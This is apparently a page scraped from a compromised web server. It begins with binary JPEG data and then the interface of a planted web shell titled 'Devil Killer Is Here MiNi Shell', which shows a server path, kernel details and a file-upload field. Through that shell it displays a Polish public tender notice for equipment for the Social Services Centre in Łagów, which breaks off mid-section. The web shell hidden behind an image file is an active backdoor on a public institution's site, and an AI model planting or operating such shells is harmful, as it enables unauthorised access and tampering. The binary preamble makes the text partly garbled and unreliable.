JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250128/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250128/0007095801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> DOSTAWA SPRZĘTU I WYPOSAŻENIA W PROJEKCIE PN.: „CENTRUM USŁUG SPOŁECZNYCH W ŁAGOWIE” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Usług Społecznych w Łagowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 290635400</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 62</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łagów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-025</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(0-41) 343 70 59</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">nie dotyczy</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">cus@lagowgmina.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://mgopslagow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> DOSTAWA SPRZĘTU I WYPOSAŻENIA W PROJEKCIE PN.: „CENTRUM USŁUG SPOŁECZNYCH W ŁAGOWIE” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fbe7aaf3-0e9c-47d1-b7e6-0257e50afe3e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00070958</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-01-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00070752/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa sprzętu i wyposażenia w projekcie pn.: &#34;Centrum Usług Społecznych w Łagowie&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „CENTRUM USŁUG SPOŁECZNYCH W ŁAGOWIE” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://lagowgmina.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji za pośrednictwem Platformy znajdującej się pod adresem: https://lagowgmina.ezamawiajacy.pl w zakładce „Korespondencja” lub e-maila cus@lagowgmina.pl<br/>Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przekazywanym na adres e-mail Zamawiającego przyjmuje się datę dostarczenia wiadomości na adres e-mail Zamawiającego. W przypadku skorzystania z Platformy za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich złożenia/wysłania na Platformie.<br/>Pozostałe wymagane informacje Zamawiający zawarł w Rozdziale 14 Specyfikacji Warunków Zamówienia w przedmiotowym postępowaniu.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z § 3 ust. 3 ww. Rozporządzenia określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>1)	Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2)	Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>3)	Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>4)	Włączona obsługa JavaScript;<br/>5)	Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>Zamawiający zgodnie z § 3 ust. 3 ww. Rozporządzenia, określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/><br/>Pozostałe wymagane informacje Zamawiający zawarł w Rozdziale 14 Specyfikacji Warunków Zamówienia w przedmiotowym postępowaniu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez Wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/>Zamawiający informuje, że:<br/>1.	administratorem danych osobowych jest Dyrektor Centrum Usług Społecznych w Łagowie z adresem i siedzibą ul. Rynek 62, 26 – 025 Łagów, tel. 41 343 70 59 e – mail: cus@lagowgmina.pl (Zamawiajacy) <br/>2.	administratorem danych osobowych jest Burmistrz Miasta i Gminy w Łagowie z adresem i siedzibą Urząd Miasta i Gminy w Łagowie, ul. Rynek 62, 26 – 025 Łagów, tel. 41 343 70 54, e – mail: urzad@lagowgmina.pl (Beneficjent) <br/>3.	dane kontaktowe inspektora ochrony danych osobowych w Centrum Usług Społecznych w Łagowie ul. Rynek 62, 26 – 025 Łagów - Marek Woźniak, tel: +48 694164023, e-mail: iodo@marwikpoland.pl (Zamawiający) <br/>4.	dane kontaktowe inspektora ochrony danych osobowych w Urzędzie Miasta i Gminy w Łagowie, ul. Rynek 62, 26 – 025 Łagów – Anna Głowcka, tel: +48 690 616 117 e-mail: iod@lagowgmina.pl (Beneficjent) <br/>5.	dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego, realizacją umowy oraz w celu wypełnienia obowiązków prawnych ciążących na Gminie Łagów/ w związku z projektem pn.: „Centrum Usług Społecznych w Łagowie” oraz prowadzonym pod znakiem sprawy: CUS.1.2025 postępowaniem o udzielenie zamówienia publicznego. <br/>6.	odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2024 r. poz. 1320 z późn. zm.), dalej „ustawa Pzp”; <br/>7.	- organy władzy publicznej oraz podmioty wykonujące zadania publiczne lub działające na zlecenie organów władzy publicznej z zakresie i w celach, które wynikają z przepisów powszechnie obowiązującego prawa; - inne podmioty, które na podstawie stosownych umów podpisanych z Gminą Łagów przetwarzają dane osobowe dla których Administratorem jest Burmistrz Miasta i Gminy Łagów.<br/>8.	dane osobowe będą przechowywane przez okres wynikający z regulacji prawnych (kategorii archiwalnej dokumentacji, określonej w jednolitym rzeczowym wykazie akt dla organów gmin i związków międzygminnych oraz wynikająca z umowy o dofinansowanie projektu. Kategorie okresu przechowywania ustala się w oparciu o klasyfikacje i kwalifikacje dokumentu w jednolitym rzeczowym wykazie akt; <br/>9.	obowiązek podania przez Wykonawców danych osobowych bezpośrednio ich dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>10.	w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; Wykonawca posiada: <br/>− na podstawie art. 15 RODO prawo dostępu do swoich danych osobowych; <br/>− na podstawie art. 16 RODO prawo do sprostowania swoich danych osobowych **; <br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie danych osobowych bezpośrednio jego dotyczących narusza przepisy RODO; <br/><br/>Pozostałe wymagane informacje Zamawiający zawarł w Rozdziale 28 Specyfikacji Warunków Zamówienia w przedmiotowym postępowaniu</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Wykonawcy nie przysługuje: <br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CUS .1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa sprzętu i wyposażenia w projekcie pn.: „CENTRUM USŁUG SPOŁECZNYCH W ŁAGOWIE”.<br/>Zamawiający dokonał podziału zamówienia na 4 części:<br/>1)	Meble i sprzęt o podobnych cechach<br/>2)	Sprzęt komputerowy, elektroniczny i elektryczny<br/>3)	Pakiety powitalne dla nowonarodzonych<br/>4)	Niezbędnik seniora<br/>Zamawiający dopuszcza składanie ofert częściowych. Ofertę można złożyć na dowolną liczbę części. Oferta na daną część musi obejmować całość asortymentu składającego się na tą część. <br/>Zamawiający nie ogranicza liczby części, które mogą być udzielone jednemu Wykonawcy.<br/>Szczegółowy opis przedmiotu zamówienia określony został w załączniku nr 3 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39000000-2 - Meble (włącznie z biurowymi), wyposażenie, urządzenia domowe (z wyłączeniem oświetlenia) i środki czyszczące</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium 1 - Cena<br/>(cena najniższa / cena badana) x 50 pkt.<br/><br/>Przez cenę rozumiana jest łączna wartość brutto za wykonanie zamówienia, wskazana w formularzu ofertowym – dla części na którą składana jest oferta.<br/>Maksymalnie w kryterium „Cena” oferta może uzyskać 50 punktów.<br/><br/>Kryterium 2 - Termin realizacji zamówienia <br/>Termin realizacji zamówienia liczony jest w dniach kalendarzowych od zawarcia umowy, przy czym, maksymalny wymagany termin realizacji zamówienia wskazano w pkt 5.1. SWZ. Oferty z terminem realizacji dłuższym niż maksymalny wymagany zostaną odrzucone jako niezgodne z treścią SWZ. W przypadku braku wskazania przez Wykonawcę w ofercie terminu realizacji, Zamawiający przyjmie, że Wykonawca oferuje maksymalny wymagany w części zamówienia termin realizacji.<br/>Punkty przyznane zostaną w następujący sposób:<br/>1)	Termin realizacji zamówienia 5 dni kalendarzowych od dnia podpisania umowy – 30 punktów,<br/>2)	Termin realizacji zamówienia 10 dni kalendarzowych od dnia podpisania umowy– 20 punktów,<br/>3)	Termin realizacji zamówienia 15 dni kalendarzowych od dnia podpisania umowy – 10 punktów,<br/>4)	Termin realizacji zamówienia 30 dni kalendarzowych od dnia podpisania umowy – 0 punktów,<br/><br/>Maksymalnie w kryterium „Termin realizacji zamówienia” oferta może uzyskać 30 punktów.<br/><br/>Kryterium 3 - Okres gwarancji<br/>Okres gwarancji liczony jest w miesiącach od daty odbioru, przy czym minimalny wymagany okres gwarancji wynosi 24 miesiące dla sprzętu z wszystkich części zamówienia.<br/>Oferty z okresem gwarancji krótszym niż wymagany powyżej zostaną odrzucone jako niezgodne z warunkami zamówienia. W przypadku braku wskazania przez Wykonawcę w ofercie okresu gwarancji, Zamawiający przyjmie, że Wykonawca oferuje minimalny wymagany okres gwarancji. Maksymalny okres gwarancji wynosi 48 miesięcy.<br/>W przypadku, gdy Wykonawca zaoferuje dłuższy (niż maksymalny) okres gwarancji, Zamawiający do oceny ofert przyjmie odpowiedni okres maksymalny wskazany powyżej (przy czym w umowie zostanie wskazany okres zaoferowany w ofercie).<br/>Punkty przyznane zostaną w następujący sposób:<br/>1)	Okres gwarancji 24 miesiące – 0 punktów,<br/>2)	Okres gwarancji 30 miesięcy – 3 punkty,<br/>3)	Okres gwarancji 36 miesięcy – 6 punktów,<br/>4)	Okres gwarancji 42 miesiące – 10 punktów,<br/>5)	Okres gwarancji 48 miesięcy – 15 punktów,<br/><br/>Maksymalnie w kryterium „Gwarancja” oferta może uzyskać 15 punktów.<br/><br/>Kryterium 4 - Aspekt społeczny zatrudnieniowy<br/>W kryterium społecznym zatrudnieniowym, ofertom zostaną przyznane punkty zgodnie z następującymi zasadami:<br/>1)	2 punktów - za zatrudnienie na podstawie umowy o pracę (w dowolnym wymiarze czasu pracy) bezpośrednio do świadczenia prac wchodzących w zakres zamówienia 1 osoby spośród osób zagrożonych wykluczeniem społecznym, w rozumieniu art. 2 pkt 6 ustawy z dnia 5 sierpnia 2022 r. o ekonomii społecznej (t.j. Dz.U. z 2024r. poz. 113),<br/><br/>2)	5 punktów - za zatrudnienie na podstawie umowy o pracę (w dowolnym wymiarze czasu pracy) bezpośrednio do świadczenia prac wchodzących w zakres zamówienia 2 lub więcej osób spośród osób zagrożonych wykluczeniem społecznym, w rozumieniu art. 2 pkt 6 ustawy z dnia 5 sierpnia 2022 r. o ekonomii społecznej (t.j. Dz.U. z 2024r. poz. 113).<br/><br/>Ocena oferty w niniejszym kryterium dokonana zostanie na podstawie informacji zawartych w Formularzu ofertowym. W przypadku braku w Formularzu ofertowym deklaracji dotyczącej zatrudnienia osób spełniających warunki wskazane powyżej, Zamawiający nie przyzna wykonawcy punktów w tym kryterium.<br/><br/>Maksymalnie w kryterium „Aspekt społeczny zatrudnieniowy” oferta może uzyskać 5 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium –Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium –Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt społeczny zatrudnieniowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa sprzętu i wyposażenia w projekcie pn.: „CENTRUM USŁUG SPOŁECZNYCH W ŁAGOWIE”.<br/>Zamawiający dokonał podziału zamówienia na 4 części:<br/>1)	Meble i sprzęt o podobnych cechach<br/>2)	Sprzęt komputerowy, elektroniczny i elektryczny<br/>3)	Pakiety powitalne dla nowonarodzonych<br/>4)	Niezbędnik seniora<br/>Zamawiający dopuszcza składanie ofert częściowych. Ofertę można złożyć na dowolną liczbę części. Oferta na daną część musi obejmować całość asortymentu składającego się na tą część. <br/>Zamawiający nie ogranicza liczby części, które mogą być udzielone jednemu Wykonawcy.<br/>Szczegółowy opis przedmiotu zamówienia określony został w załączniku nr 3 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <p class="mb-0">30000000-9 - Maszyny biurowe i liczące, sprzęt i materiały, z wyjątkiem mebli i pakietów oprogramowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium 1 - Cena<br/>(cena najniższa / cena badana) x 50 pkt.<br/><br/>Przez cenę rozumiana jest łączna wartość brutto za wykonanie zamówienia, wskazana w formularzu ofertowym – dla części na którą składana jest oferta.<br/>Maksymalnie w kryterium „Cena” oferta może uzyskać 50 punktów.<br/><br/>Kryterium 2 - Termin realizacji zamówienia <br/>Termin realizacji zamówienia liczony jest w dniach kalendarzowych od zawarcia umowy, przy czym, maksymalny wymagany termin realizacji zamówienia wskazano w pkt 5.1. SWZ. Oferty z terminem realizacji dłuższym niż maksymalny wymagany zostaną odrzucone jako niezgodne z treścią 